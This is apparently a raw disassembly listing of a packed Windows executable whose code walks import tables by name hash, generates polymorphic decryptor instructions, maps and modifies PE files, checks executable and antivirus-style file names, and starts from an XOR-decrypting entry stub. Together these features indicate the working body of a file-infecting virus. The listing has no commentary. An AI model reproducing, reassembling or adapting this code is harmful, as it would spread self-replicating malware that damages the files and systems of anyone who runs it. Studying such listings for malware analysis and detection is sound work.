sub_3110A4EF proc near ; CODE XREF: sub_3110A4B2+20�p
pop dword ptr [ebp+4038E6h]
mov [ebp+4038E2h], edx
call sub_3110A503
xor ecx, ecx
retn
sub_3110A4EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3110A503 proc near ; CODE XREF: sub_3110A4B2+10�p
; sub_3110A4EF+C�p
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3110A3FC
add edx, [ebp+4038FEh]
add edx, esi
loc_3110A517: ; CODE XREF: sub_3110A503+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3110A628
cmp dword ptr [edx+10h], 0
jz locret_3110A628
mov eax, [edx+0Ch]
push eax
call sub_3110A3FC
add eax, [ebp+4038FEh]
add eax, esi
push eax
loc_3110A53D: ; CODE XREF: sub_3110A503+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3110A55D
cmp cl, 2Eh
jz short loc_3110A54C
loc_3110A549: ; CODE XREF: sub_3110A503+58�j
inc eax
jmp short loc_3110A53D
; ---------------------------------------------------------------------------
loc_3110A54C: ; CODE XREF: sub_3110A503+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3110A549
loc_3110A55D: ; CODE XREF: sub_3110A503+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3110A620
cmp word ptr [eax-2], 3233h
jnz loc_3110A620
push esi
cmp dword ptr [edx], 0
jnz short loc_3110A580
mov ecx, [edx+10h]
jmp short loc_3110A582
; ---------------------------------------------------------------------------
loc_3110A580: ; CODE XREF: sub_3110A503+76�j
mov ecx, [edx]
loc_3110A582: ; CODE XREF: sub_3110A503+7B�j
add esi, ecx
push ecx
call sub_3110A3FC
add esi, [ebp+4038FEh]
loc_3110A590: ; CODE XREF: sub_3110A503+90�j
; sub_3110A503+117�j
lodsd
test eax, eax
js short loc_3110A590
jz loc_3110A61F
push dword ptr [ebp+4038FEh]
push eax
call sub_3110A3FC
add eax, [ebp+4038FEh]
pop dword ptr [ebp+4038FEh]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3110A5BC: ; CODE XREF: sub_3110A503+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3110A5D3
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3110A5BC
; ---------------------------------------------------------------------------
loc_3110A5D3: ; CODE XREF: sub_3110A503+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3110A619
cmp ebx, 0DB6E45A8h
jz short loc_3110A619
cmp ebx, 0FFA13B59h
jz short loc_3110A619
cmp ebx, 0ACB522D6h
jz short loc_3110A619
cmp ebx, 0F358E993h
jz short loc_3110A619
cmp ebx, 0F358E97Dh
jz short loc_3110A619
cmp ebx, 0E1253F46h
jz short loc_3110A619
cmp ebx, 0E1253F30h
jz short loc_3110A619
call dword ptr [ebp+4038E6h]
loc_3110A619: ; CODE XREF: sub_3110A503+D6�j
; sub_3110A503+DE�j ...
pop ebx
jmp loc_3110A590
; ---------------------------------------------------------------------------
loc_3110A61F: ; CODE XREF: sub_3110A503+92�j
pop esi
loc_3110A620: ; CODE XREF: sub_3110A503+60�j
; sub_3110A503+6C�j
add edx, 14h
jmp loc_3110A517
; ---------------------------------------------------------------------------
locret_3110A628: ; CODE XREF: sub_3110A503+18�j
; sub_3110A503+22�j
retn
sub_3110A503 endp
; ---------------------------------------------------------------------------
db 2, 6Ah, 4
dd 0F62CE858h, 9588FFFFh, 402429h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF611E8h, 8C283FFh, 56AD187h
dd 0F604E858h, 0FA80FFFFh, 0B00B7303h, 29850250h, 0AA004024h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F5E4E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 3394BD8Dh, 85F70040h, 40338Ah, 80000000h
dd 60B00374h, 8A85F7AAh, 3004033h, 0F010000h, 0F684h
db 0, 0B8h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
call near ptr 0EE9A526Dh
jmp far ptr 0AAE8h:0B0004038h
; ---------------------------------------------------------------------------
db 0ABh, 0F7h, 85h
dd 40338Ah, 1000000h, 38EEBD89h, 4B740040h, 338A85F7h
dd 40h, 67B80200h, 7536FF64h, 6467B805h, 66AB2E8Bh, 660000B8h
dd 0B00374ABh, 85F7AA5Dh, 40338Ah, 8000000h, 86D8DB8h
dd 0F7167500h, 40338A85h, 0
dd 0C583B804h, 5740008h, 0F8ED83B8h, 0F74FAB00h, 40338A85h
dd 300h, 0B0047400h, 8BABAAE9h, 4038EA85h, 2BCF8B00h, 0FC4889C8h
dd 338A85F7h, 30040h, 5F740000h, 0FF6467B8h, 0F2BD8936h
dd 0AB004038h, 670000B8h, 89B8AB64h, 0AB000026h, 0FFFEBDE8h
dd 0E820B0FFh, 0FFFFFCCFh, 0B86639E3h, 0AB6615FFh, 958BAB91h
dd 40338Ah, 0C2F7D2F7h, 3, 97E81475h, 0B0FFFFFEh, 0FCA9E81Fh
dd 0B866FFFFh, 0AB6615FFh, 0CF8BAB91h, 38F2858Bh, 0C82B0040h
dd 0F7FC4889h, 40338A85h, 400h, 0B8127400h, 0C8FEC029h
dd 0C008B8ABh, 0B8AB0474h, 67EBF875h, 8A85F7ABh, 8004033h
dd 75000000h, 88BD804Ah, 4033h, 29B84174h, 0AC92918h, 403384A5h
dd 3E4C000h, 3384A50Ah, 0B0AB0040h, 858AAAB1h, 403388h
dd 0A40B0AAh, 40338485h, 0B866AA00h, 85F7FDE2h, 40338Ah
dd 10h, 49B00774h, 75B866AAh, 0B0AB66FCh, 0C033AAE8h, 0D6BD89ABh
dd 0F7004038h, 40338A85h, 2000h, 0B0097500h, 82850A58h
dd 0AA004033h, 0C081B866h, 338A85F7h, 400040h, 3740000h
dd 0A28C480h, 403382A5h, 89AB6600h, 4038DABDh, 85F7AB00h
dd 40338Ah, 40000000h, 50B00975h, 33828502h, 0F7AA0040h
dd 40338A85h, 8000h, 0B00B7500h, 83850AB8h, 0AA004033h
dd 0B8663DEBh, 85F71831h, 40338Ah, 100h, 29B00274h, 3383A50Ah
dd 0E4C00040h, 83A50A03h, 66004033h, 81B866ABh, 8A85F7F0h
dd 4033h, 75000002h, 0AC8B402h, 403383A5h, 89AB6600h, 4038F6BDh
dd 2394B800h, 0F7AB0000h, 40338A85h, 800h, 0F76C7400h
dd 40338A85h, 40000h, 0B00B7500h, 84850AB8h, 0AA004033h
dd 85F74DEBh, 40338Ah, 800h, 0B8661175h, 0A50AE083h, 403384h
dd 0C033AB66h, 6615EBAAh, 0A1829B8h, 403384A5h, 3E4C000h
dd 3384A50Ah, 0AB660040h, 338A85F7h, 10000040h, 0B8660000h
dd 374C081h, 0A08C480h, 403384A5h, 0FAB6600h, 338885B6h
dd 0F7AB0040h, 40338A85h, 0
; ---------------------------------------------------------------------------
inc eax
jz short loc_3110A968
mov al, 50h
add al, [ebp+403382h]
stosb
loc_3110A968: ; CODE XREF: UPX2:3110A95D�j
test dword ptr [ebp+40338Ah], 2000h
mov al, 86h
jnz short loc_3110A978
add al, 4
loc_3110A978: ; CODE XREF: UPX2:3110A974�j
lea ecx, [edi-2]
mov ah, [ebp+403382h]
mov [ebp+4038DEh], ecx
stosw
cmp ah, 5
jnz short loc_3110A995
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3110A995: ; CODE XREF: UPX2:3110A98C�j
test dword ptr [ebp+40338Ah], 4000h
mov ax, 3166h
jnz short loc_3110A9A7
mov ah, 29h
loc_3110A9A7: ; CODE XREF: UPX2:3110A9A3�j
stosw
mov al, 18h
or al, [ebp+403384h]
shl al, 3
stosb
mov al, 88h
test dword ptr [ebp+40338Ah], 8000h
jnz short loc_3110A9C5
mov al, 86h
loc_3110A9C5: ; CODE XREF: UPX2:3110A9C1�j
mov ah, [ebp+403382h]
stosw
cmp ah, 5
jnz short loc_3110A9D9
mov al, 0
or byte ptr [edi-1], 40h
stosb
loc_3110A9D9: ; CODE XREF: UPX2:3110A9D0�j
test dword ptr [ebp+40338Ah], 10000h
jnz short loc_3110A9F0
mov al, 40h
or al, [ebp+403382h]
stosb
jmp short loc_3110A9FF
; ---------------------------------------------------------------------------
loc_3110A9F0: ; CODE XREF: UPX2:3110A9E3�j
mov ax, 0C083h
or ah, [ebp+403382h]
stosw
mov al, 1
stosb
loc_3110A9FF: ; CODE XREF: UPX2:3110A9EE�j
test dword ptr [ebp+40338Ah], 20000h
jnz short loc_3110AA3A
test dword ptr [ebp+40338Ah], 40000h
jnz short loc_3110AA31
mov al, 0C0h
or al, [ebp+403384h]
mov ah, [ebp+403389h]
shl eax, 10h
mov ax, 8166h
stosd
mov al, 0
jmp short loc_3110AA39
; ---------------------------------------------------------------------------
loc_3110AA31: ; CODE XREF: UPX2:3110AA15�j
mov al, 40h
or al, [ebp+403384h]
loc_3110AA39: ; CODE XREF: UPX2:3110AA2F�j
stosb
loc_3110AA3A: ; CODE XREF: UPX2:3110AA09�j
test dword ptr [ebp+40338Ah], 80000h
jnz short loc_3110AA56
mov ax, 0E883h
or ah, [ebp+403383h]
stosw
mov al, 1
jmp short loc_3110AA5E
; ---------------------------------------------------------------------------
loc_3110AA56: ; CODE XREF: UPX2:3110AA44�j
mov al, 48h
or al, [ebp+403383h]
loc_3110AA5E: ; CODE XREF: UPX2:3110AA54�j
stosb
test dword ptr [ebp+40338Ah], 100000h
mov cl, 75h
jnz short loc_3110AA92
mov ax, 0F883h
or ah, [ebp+403383h]
stosw
xor eax, eax
stosb
sub [ebp+4038DEh], edi
test dword ptr [ebp+40338Ah], 200000h
jnz short loc_3110AAAD
mov cl, 77h
jmp short loc_3110AAAD
; ---------------------------------------------------------------------------
loc_3110AA92: ; CODE XREF: UPX2:3110AA6B�j
mov ax, 1809h
or ah, [ebp+403383h]
shl ah, 3
or ah, [ebp+403383h]
stosw
sub [ebp+4038DEh], edi
loc_3110AAAD: ; CODE XREF: UPX2:3110AA8C�j
; UPX2:3110AA90�j
mov al, cl
mov ah, [ebp+4038DEh]
stosw
mov al, 58h
add al, [ebp+403382h]
stosb
test dword ptr [ebp+40338Ah], 1000003h
jz loc_3110AB57
mov eax, 268B6467h
mov ecx, [ebp+40338Ah]
xor ecx, 2000000h
test ecx, 3000000h
jnz short loc_3110AAEE
mov eax, 2E876467h
loc_3110AAEE: ; CODE XREF: UPX2:3110AAE7�j
stosd
mov eax, 0
stosw
jnz short loc_3110AAFE
mov ax, 0E58Bh
stosw
loc_3110AAFE: ; CODE XREF: UPX2:3110AAF6�j
mov eax, 68F6764h
stosd
xor eax, eax
stosw
test dword ptr [ebp+40338Ah], 1000000h
jnz short loc_3110AB54
test dword ptr [ebp+40338Ah], 8000000h
jz short loc_3110AB46
mov ax, 6C8Dh
test dword ptr [ebp+40338Ah], 2000000h
setnz cl
or ah, cl
stosw
test cl, cl
jnz short loc_3110AB41
mov ax, 424h
stosw
jmp short loc_3110AB54
; ---------------------------------------------------------------------------
loc_3110AB41: ; CODE XREF: UPX2:3110AB37�j
mov al, 8
stosb
jmp short loc_3110AB54
; ---------------------------------------------------------------------------
loc_3110AB46: ; CODE XREF: UPX2:3110AB1E�j
mov ax, 5D58h
add al, [ebp+403384h]
stosw
jmp short loc_3110AB57
; ---------------------------------------------------------------------------
loc_3110AB54: ; CODE XREF: UPX2:3110AB12�j
; UPX2:3110AB3F�j ...
mov al, 0C9h
stosb
loc_3110AB57: ; CODE XREF: UPX2:3110AACA�j
; UPX2:3110AB52�j
test dword ptr [ebp+40338Ah], 80000000h
jz short loc_3110AB83
mov al, 7
sub al, [ebp+403382h]
shl eax, 1Ah
or eax, 240889h
add ah, [ebp+403382h]
shl ah, 3
add ah, 4
stosd
mov al, 61h
stosb
loc_3110AB83: ; CODE XREF: UPX2:3110AB61�j
mov ax, 0E0FFh
or ah, [ebp+403382h]
stosw
test dword ptr [ebp+40338Ah], 20h
jz short loc_3110ABEE
test dword ptr [ebp+40338Ah], 20000000h
jz short loc_3110ABB4
loc_3110ABA7: ; CODE XREF: UPX2:3110ABB2�j
test edi, 3
jz short loc_3110ABB4
mov al, 90h
stosb
jmp short loc_3110ABA7
; ---------------------------------------------------------------------------
loc_3110ABB4: ; CODE XREF: UPX2:3110ABA5�j
; UPX2:3110ABAD�j
mov eax, edi
mov ecx, [ebp+4038D6h]
sub eax, ecx
mov [ecx-4], eax
mov al, 58h
or al, [ebp+403382h]
stosb
test dword ptr [ebp+40338Ah], 400000h
jz short loc_3110ABE2
mov ax, 0C350h
or al, [ebp+403382h]
jmp short loc_3110ABEC
; ---------------------------------------------------------------------------
loc_3110ABE2: ; CODE XREF: UPX2:3110ABD4�j
mov ax, 0E0FFh
or ah, [ebp+403382h]
loc_3110ABEC: ; CODE XREF: UPX2:3110ABE0�j
stosw
loc_3110ABEE: ; CODE XREF: UPX2:3110AB99�j
test dword ptr [ebp+40338Ah], 1000003h
jz short loc_3110AC6D
test dword ptr [ebp+40338Ah], 20000000h
jz short loc_3110AC13
loc_3110AC06: ; CODE XREF: UPX2:3110AC11�j
test edi, 3
jz short loc_3110AC13
mov al, 90h
stosb
jmp short loc_3110AC06
; ---------------------------------------------------------------------------
loc_3110AC13: ; CODE XREF: UPX2:3110AC04�j
; UPX2:3110AC0C�j
mov ecx, edi
mov eax, [ebp+4038EEh]
sub ecx, eax
mov [eax-4], ecx
xor ecx, ecx
test dword ptr [ebp+40338Ah], 800000h
jnz short loc_3110AC3C
lea eax, [ebp+403382h]
loc_3110AC34: ; CODE XREF: UPX2:3110AC3A�j
mov cl, [eax]
inc eax
cmp cl, 3
jnb short loc_3110AC34
loc_3110AC3C: ; CODE XREF: UPX2:3110AC2C�j
lea eax, ds:102444h[ecx*8]
shl eax, 8
mov al, 8Bh
stosd
jecxz short loc_3110AC51
mov ax, 0C031h
stosw
loc_3110AC51: ; CODE XREF: UPX2:3110AC49�j
mov ax, 808Fh
push 0B8h
add ah, cl
stosw
pop eax
stosd
test ecx, ecx
jnz short loc_3110AC6A
mov ax, 0C031h
stosw
loc_3110AC6A: ; CODE XREF: UPX2:3110AC62�j
mov al, 0C3h
stosb
loc_3110AC6D: ; CODE XREF: UPX2:3110ABF8�j
lea eax, [ebp+403394h]
test dword ptr [ebp+40338Ah], 10000000h
jnz short loc_3110AC85
push edi
sub edi, eax
pop eax
jmp short loc_3110AC9E
; ---------------------------------------------------------------------------
loc_3110AC85: ; CODE XREF: UPX2:3110AC7D�j
mov edx, [ebx+28h]
sub edi, eax
sub edx, eax
mov ecx, [ebp+4038F6h]
add [ebp+4038D6h], edx
add [ecx], edi
mov eax, [esp+4]
loc_3110AC9E: ; CODE XREF: UPX2:3110AC83�j
mov [ebp+40106Fh], edi
mov edi, [ebp+4038DAh]
sub eax, [ebp+4038D6h]
test dword ptr [ebp+40338Ah], 40h
jz short loc_3110ACBE
neg eax
loc_3110ACBE: ; CODE XREF: UPX2:3110ACBA�j
stosd
retn 4
; ---------------------------------------------------------------------------
dw 5756h
dd 3902BD83h, 0F000040h, 1D984h, 0DE800h, 454B0000h, 4C454E52h
dd 442E3233h, 0FF004C4Ch, 4034E095h, 12858900h, 53004039h
dd 33C588Bh, 2873FFD8h, 0E834438Bh, 0FFFFF6FCh, 38FA958Bh
dd 35B0040h, 85890C42h, 403916h, 89084203h, 40391A85h
dd 28738B00h, 80B3FFh, 0D5E80000h, 8BFFFFF6h, 4038FABDh
dd 0C9E85600h, 8BFFFFF6h, 4038FA95h, 84A8B00h, 2B0C4A03h
dd 5E983CEh, 160880Fh, 840F0000h, 15Ah, 38FEB503h, 0B5030040h
dd 4038CAh, 0FE83CACh, 0A285h, 4468D00h, 38CA852Bh, 6030040h
dd 0F686E850h, 0BD83FFFFh, 4038FAh, 3B0B7500h, 830F0C47h
dd 11Bh, 95390CEBh, 4038FAh, 10D850Fh, 85030000h, 4038CAh
dd 0FF388166h, 0FC850F25h, 8B000000h, 432B0240h, 49E85034h
dd 39FFFFF6h, 4038FABDh, 0E4850F00h, 3000000h, 4038FE85h
dd 0CA850300h, 8B004038h, 0C472B00h, 0CD820Fh, 473B0000h
dd 0C4830F08h, 83000000h, 470302C0h, 0CA850314h, 52004038h
dd 12B5FF50h, 0FF004039h, 4034A095h, 0C0855A00h, 0B7850Fh
dd 9CE90000h, 3C000000h, 94850FFFh, 80000000h, 850F153Eh
dd 8Bh, 2B01468Bh, 0E8503443h, 0FFFFF5D8h, 38FABD39h, 77750040h
dd 38FE8503h, 85030040h, 4038CAh, 391E8589h, 8B0040h, 3916853Bh
dd 8720040h, 391A853Bh, 69720040h, 3Dh, 0E8377270h, 1Fh
dd 8BFC4E8Dh, 3022BC1h, 853B1042h, 40391Eh, 0C4830C75h
dd 8F31FF10h, 611C2444h, 8FC31BEBh, 4038E685h, 0B58B6000h
dd 4038CAh, 0FFF676E8h, 0A961FFh, 75800000h, 0C472B0Eh
dd 473B0972h, 3C820F08h, 49FFFFFFh, 0FEB2850Fh, 3C8BFFFFh
dd 8AA78124h, 0FF000023h, 0EB7FFFFFh, 244A813Ch, 0E0000060h
dd 8BC0334Eh, 8587240Ch, 403902h, 238EB98Dh, 85030000h
dd 4038CAh, 4EA5A566h, 4203C62Bh, 0C422B14h, 0E8FB46C6h
dd 5481C7h, 50000h, 46890000h, 0C35E5FFCh, 37A6B58Dh, 0FF560040h
dd 4034D495h, 0FFF88300h, 0BB840Fh, 85890000h, 4038AAh
dd 0FF56006Ah, 40350C95h, 0FC08500h, 0A484h, 50C02B00h
dd 50036A50h, 68016Ah, 56C00000h, 34B495FFh, 0F8830040h
dd 3F840FFFh, 89000005h, 4038AE85h, 0B28D8D00h, 8D004038h
dd 4038BA95h, 6A525100h, 95FF5000h, 4034DCh, 0FFFF883h
dd 50D84h, 0FF006A00h, 4038AEB5h, 0D895FF00h, 83004034h
dd 840FFFF8h, 4F6h, 38C28589h, 0C9330040h, 5051C303h, 51046A51h
dd 38AEB5FFh, 95FF0040h, 4034B8h, 840FC085h, 4D2h, 8589C933h
dd 4038C6h, 68515151h, 0F001Fh, 0F895FF50h, 85004034h
dd 8B840FC0h, 89000004h, 4038CA85h, 21B8C300h, 8B000069h
dd 85F7384Bh, 40338Ah, 10000000h, 85030675h, 40106Fh, 0C103D233h
dd 0E1F7F1F7h, 38D28589h, 93B80040h, 8B000023h, 85033C4Bh
dd 40106Fh, 0C103D233h, 0E1F7F1F7h, 38CE8589h, 0FC30040h
dd 0F9064BB7h, 538D35E3h, 43B70F18h, 49D00314h, 328C16Bh
dd 5F3A81D0h, 0F96E6977h, 7A831D74h, 0E072010Ch, 8B3C4B8Bh
dd 42031442h, 48448D10h, 23D9F7FFh, 0C2853BC1h, 0C3004038h
dd 1024548Bh, 828FC033h, 0B8h, 0EBCF8BC3h, 0A6BD8D0Bh
dd 0FC004037h, 0C933DF8Bh, 72613CACh, 777A3C06h, 0AA202C02h
dd 0EC745C3Ch, 0DD742E3Ch, 0E875003Ch, 18BC9E3h, 4558453Dh
dd 3D0B7400h, 524353h, 0FF33850Fh, 38BFFFFh, 4E49573Dh
dd 26840F43h, 3DFFFFFFh, 4E554357h, 0FF1B840Fh, 573DFFFFh
dd 0F323343h, 0FFFF1084h, 53503DFFh, 840F4F54h, 0FFFFFF05h
dd 2DE8DB33h, 0FFFFFFEh, 0FFFEF884h, 0E8D233FFh, 16h, 0FFFF6FE8h
dd 0E8FFh, 815D0000h, 402EE2EDh, 33EE900h, 0FF640000h
dd 0CAB58B32h, 64004038h, 81662289h, 0F5A4D3Eh, 32785h
dd 3C5E8B00h, 8166DE03h, 0F45503Bh, 31785h, 1643F700h
dd 2000h, 30A850Fh, 43F60000h, 840F025Ch, 300h, 20087B81h
dd 0F202020h, 2F384h, 0FED1E800h, 820FFFFFh, 2E8h, 3104A8Bh
dd 0B80C4Ah, 51000100h, 0FFEB09E8h, 889530FFh, 0B1004033h
dd 89B53020h, 6A004033h, 58C9FE20h, 0EFE81478h, 85FFFFEAh
dd 0C2940FD2h, 9531E2D3h, 40338Ah, 668E5EBh, 59000000h
dd 668h, 0CFE85800h, 8AFFFFEAh, 40338285h, 2A848600h, 403382h
dd 33828588h, 0E0E20040h, 338A85F7h, 80040h, 9750000h
dd 3384BD80h, 74010040h, 8A85F7C5h, 3004033h, 74010000h
dd 82BD801Bh, 5004033h, 0BD80B074h, 403383h, 80A77405h
dd 403384BDh, 9E740500h, 338A85F7h, 40h, 9748000h, 3382BD80h
dd 77020040h, 2A58389h, 4039h, 0FFF493E8h, 0FDC4E8FFh
dd 2AE8FFFFh, 8B000002h, 4038CE9Dh, 0FCE2E800h, 840FFFFFh
dd 210h, 38CAB58Bh, 5E8B0040h, 0E8DE033Ch, 0FFFFFDE3h
dd 1FA820Fh, 4A810000h, 6024h, 52FE8BE0h, 147A0356h, 0F7107A03h
dd 40338A85h, 0
dd 8D0E7510h, 403394B5h, 6F8D8B00h, 0F3004010h, 0E5B957A4h
dd 8D000008h, 401000B5h, 0B1A5F300h, 0F302E300h, 987C6A4h
dd 33FFFFDEh, 338A85F7h, 40h, 840F1000h, 0A8h, 0E82873FFh
dd 0FFFFF16Ch, 38FA958Bh, 0D2850040h, 92840Fh, 0B58B0000h
dd 4038CAh, 81104A8Bh, 60244Ah, 4A2BE000h, 33027308h, 147203C9h
dd 106F8D3Bh, 8D8B0040h, 40106Fh, 3C8B5672h, 6FA58324h
dd 4010h, 6FA783h, 8B000000h, 4A01087Ah, 87F70308h, 0DA858BF7h
dd 0F7004038h, 40338A85h, 4000h, 0F7027400h, 0C720318h
dd 0B5893029h, 403902h, 128738Bh, 8A85F730h, 40004033h
dd 74000000h, 5118F702h, 0FFFCB1E8h, 0CEB59FFh, 2B287303h
dd 56510C72h, 595FA4F3h, 3394B58Dh, 0A4F30040h, 310F5E5Fh
dd 0CB878D92h, 3A000001h, 40338895h, 69067500h, 345678D2h
dd 0FF508812h, 0FFE06AE8h, 4A8B5AFFh, 104A030Ch, 338A85F7h
dd 40h, 418D1000h, 89137506h, 4039028Dh, 6F850300h, 83004010h
dd 6FA7h, 432B0000h, 54878928h, 0C7000000h, 20200843h
dd 85F72020h, 40338Ah, 80000000h, 0E8520774h, 0FFFFF926h
dd 28D8B5Ah, 0E3004039h, 284B8903h, 8B104A8Bh, 4038CE85h
dd 84A3900h, 4A890373h, 10420108h, 586383h, 38D2858Bh
dd 94680040h, 1000023h, 1590842h, 958A5043h, 403388h, 338A85F7h
dd 40h, 6741000h, 106F8D03h, 0B60040h, 338A85F7h, 40h
dd 14750002h, 85F7C6FEh, 40338Ah, 40000h, 0B58A0675h, 403389h
dd 338A85F7h, 40000040h, 0B750000h, 0C202078Ah, 0E2D602AAh
dd 8A09EBF7h, 0AAC23207h, 0F7E2D602h, 8B64D233h, 28F6422h
dd 0AEBD8358h, 4038h, 0FB87840Fh, 0B5FFFFFFh, 4038CAh
dd 351C95FFh, 0B5FF0040h, 4038C6h, 349495FFh, 8D8D0040h
dd 4038B2h, 38BA958Dh, 52510040h, 0B5FF006Ah, 4038AEh
dd 351095FFh, 0B5FF0040h, 4038AEh, 349495FFh, 0B58D0040h
dd 4037A6h, 38AAB5FFh, 0FF560040h, 40350C95h, 0AEA58300h
dd 4038h, 0E8C3h, 6A5D0000h, 0A2ED8101h, 58004032h, 85C10FF0h
dd 401554h, 83C3C085h, 0FF0FFC8h, 155485C1h, 3DC30040h
dd 2A0010h, 81661C75h, 6C0C247Ch, 60137571h, 0FFFFC4E8h
dd 0E80575FFh, 0FFFFFB7Dh, 0FFFFD2E8h, 0FF2E61FFh, 3456782Dh
dd 25B812h, 0E8600000h, 0FFFFFFA5h, 448B3975h, 0B58D3024h
dd 4037A6h, 6608508Bh, 2063A81h, 68562573h, 0FF0000h, 6AC48Bh
dd 95FF5052h, 403550h, 8108C483h, 3F3F5C3Eh, 8303755Ch
dd 2AE804C6h, 0E8FFFFFBh, 0FFFFFF7Fh, 74B8C361h, 0EB000000h
dd 2FB8B1h, 10E80000h, 0C2000000h, 30B80020h, 0E8000000h
dd 3, 8D0024C2h, 0CD0C2454h, 0F8832Eh, 0E860197Ch, 0
; ---------------------------------------------------------------------------
mov edx, [esp+30h]
pop ebp
mov ebx, [edx]
sub ebp, 40336Ch
call sub_31109B39
popa
retn 4
; ---------------------------------------------------------------------------
dw 702h
dd 3050601h, 0E6EC1E68h, 15FF3DE3h, 1001194h, 6000BE60h
dd 0BE8D3110h, 0FFFFB000h, 0FFCD8357h, 909010EBh, 90909090h
dd 8846068Ah, 0DB014707h, 1E8B0775h, 11FCEE83h, 0B8ED72DBh
dd 1, 775DB01h, 0EE831E8Bh, 11DB11FCh, 73DB01C0h, 8B0975EFh
dd 0FCEE831Eh, 0E473DB11h, 0E883C931h, 0C10D7203h, 68A08E0h
dd 0FFF08346h, 0C5897474h, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 75DB01C9h, 831E8B07h, 0DB11FCEEh, 11h, 21h dup(0)
dd 7C809B47h, 7C8308ADh, 7C910331h, 7C80ADA0h, 3 dup(0)
dd 7C80BDB6h, 7C801A24h, 7C80945Ch, 7C802367h, 7C81042Ch
dd 7C810637h, 7C864B0Fh, 7C80C058h, 7C80E7ECh, 7C81153Ch
dd 7C810A77h, 7C831C45h, 7C80B6A1h, 7C8608FFh, 7C835DCAh
dd 7C8111DAh, 7C812ADEh, 7C801D77h, 7C80B905h, 7C80BB76h
dd 7C8309E1h, 7C863DE5h, 7C863F58h, 7C812782h, 7C831CB8h
dd 7C802442h, 7C810B1Ch, 7C80B974h, 7C809A51h, 7C810D87h
dd 7C90D460h, 7C90D682h, 7C90D754h, 7C90D769h, 7C90D793h
dd 7C90DC55h, 7C90DCFDh, 7C90DD90h, 7C90DEB6h, 7C90EA32h
dd 7C9130C6h, 15h dup(0)
dd 3E003Ch, 3110B7B0h, 42005Ch, 730061h, 4E0065h, 6D0061h
dd 640065h, 62004Fh, 65006Ah, 740063h, 5C0073h, 330057h
dd 4D0032h, 700061h, 56005Fh, 720069h, 750074h, 0C6h dup(0)
dd 42C30000h, 56h, 153Dh dup(0)
UPX2 ends
; ---------------------------------------------------------------------------
; Section 4. (virtual address 00011000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00011000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_vsp_ segment para public 'CODE' use32
assume cs:_vsp_
;org 31111000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
public start
start:
nop
mov ebx, 5642C3h
nop
nop
mov esi, offset loc_3111101E
nop
nop
push 598h
pop edi
nop
loc_31111016: ; CODE XREF: .vsp_:3111101F�j
xor [esi+edi], ebx
nop
sub edi, 3
dec edi
loc_3111101E: ; DATA XREF: .vsp_:31111008�o
nop
jnz short loc_31111016
nop
call sub_311111A4
; ---------------------------------------------------------------------------
db 0
dd 0
dd 82203110h, 50000000h, 55D80000h, 0B0000000h, 0FFFF0002h
dd 908CFFFFh, 910C3110h, 911A3110h, 3110h, 2 dup(0)
dd 288C0000h, 910A0000h, 91180000h, 0Fh dup(0)
dd 42C30000h, 654B0056h, 6C656E72h, 642E3233h, 47006C6Ch
dd 65547465h, 6150706Dh, 416874h, 54746547h, 46706D65h
dd 4E656C69h, 41656D61h, 65724300h, 46657461h, 41656C69h
dd 61655200h, 6C694664h, 72570065h, 46657469h, 656C69h
dd 46746553h, 50656C69h, 746E696Fh, 43007265h, 65736F6Ch
dd 646E6148h, 4700656Ch, 69547465h, 6F436B63h, 746E75h
aGetmodulefilen db 'GetModuleFileNameA',0
aAdvapi32_dll_0 db 'ADVAPI32.dll',0
aRegopenkeyex_0 db 'RegOpenKeyExA',0
aRegqueryvalu_0 db 'RegQueryValueExA',0
aRegclosekey_0 db 'RegCloseKey',0
aSoftwareMicr_1 db 'Software\Microsoft\Windows\CurrentVersion\Explorer',0
aPinf db 'PINF',0
aInitiate db 'Initiate',0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_311111A4 proc near ; CODE XREF: .vsp_:31111022�p
var_140 = word ptr -140h
var_13E = byte ptr -13Eh
var_38 = byte ptr -38h
push ebp
mov ebp, esp
add esp, 0FFFFFEC0h
mov eax, ebp
add eax, 4
mov edx, ebp
push ebx
push esi
push edi
xor ebx, ebx
mov edi, [eax]
lea ecx, [ebp+var_38]
sub edi, 5
mov eax, [edi+0Ch]
lea esi, [edi+84h]
add eax, [edi+8]
add edx, 4
mov [edx], eax
push esi
push edi
push ecx
call sub_31111244
test al, al
jz short loc_3111123C
push esi
lea eax, [ebp+var_38]
push eax
lea edx, [ebp+var_140]
push edx
call sub_31111350
test al, al
jz short loc_31111211
cmp [ebp+var_140], 7
jb short loc_31111211
push esi
push edi
lea ecx, [ebp+var_38]
push ecx
lea eax, [ebp+var_13E]
push eax
call sub_311113B8
mov ebx, eax
loc_31111211: ; CODE XREF: sub_311111A4+4D�j
; sub_311111A4+57�j
test bl, bl
jnz short loc_3111123C
push edi
lea eax, [ebp+var_38]
push eax
lea edx, [ebp+var_13E]
push edx
call sub_311113F0
test al, al
jz short loc_3111123C
push esi
push edi
lea ecx, [ebp+var_38]
push ecx
lea eax, [ebp+var_13E]
push eax
call sub_311113B8
loc_3111123C: ; CODE XREF: sub_311111A4+38�j
; sub_311111A4+6F�j ...
pop edi
pop esi
